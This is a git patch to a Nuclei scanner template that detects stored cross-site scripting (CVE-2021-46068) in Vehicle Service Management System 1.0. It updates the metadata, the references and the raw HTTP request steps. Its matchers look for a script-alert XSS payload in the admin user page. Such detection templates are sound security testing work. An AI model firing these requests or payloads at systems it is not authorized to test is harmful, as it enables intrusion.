From f199b830e2b8ddfb0df9509c8b4046a60ae594bc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 1 Sep 2022 12:56:16 +0530
Subject: [PATCH] Update CVE-2021-46068.yaml

---
 cves/2021/CVE-2021-46068.yaml | 35 ++++++++++++++++-------------------
 1 file changed, 16 insertions(+), 19 deletions(-)

diff --git a/cves/2021/CVE-2021-46068.yaml b/cves/2021/CVE-2021-46068.yaml
index d5a626c175..801043edbf 100644
--- a/cves/2021/CVE-2021-46068.yaml
+++ b/cves/2021/CVE-2021-46068.yaml
@@ -1,25 +1,21 @@
 id: CVE-2021-46068
+
 info:
-  name: Vehicle Service Management System - "My Account" Stored Cross Site Scripting (XSS)
+  name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
-  severity: Medium
-  description: A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
   reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
     - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 4.8
     cve-id: CVE-2021-46068
-    cwe-id: CWE-79
-  tags: cve,cve2021,Stored XSS,Cross-Site-Script
+  tags: cve,cve2021,xss,vms,authenticated
 
 requests:
   - raw:
-
-      - |
-        GET /vehicle_service/admin/login.php HTTP/1.1
-        Host: {{Hostname}}
-
       - |
         POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
@@ -38,14 +34,15 @@ requests:
         GET /vehicle_service/admin/?page=user HTTP/1.1
         Host: {{Hostname}}
 
+    req-condition: true
     redirects: true
+    max-redirects: 2
     cookie-reuse: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - '"><script>alert(document.domain)</script>'
\ No newline at end of file
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
+        condition: and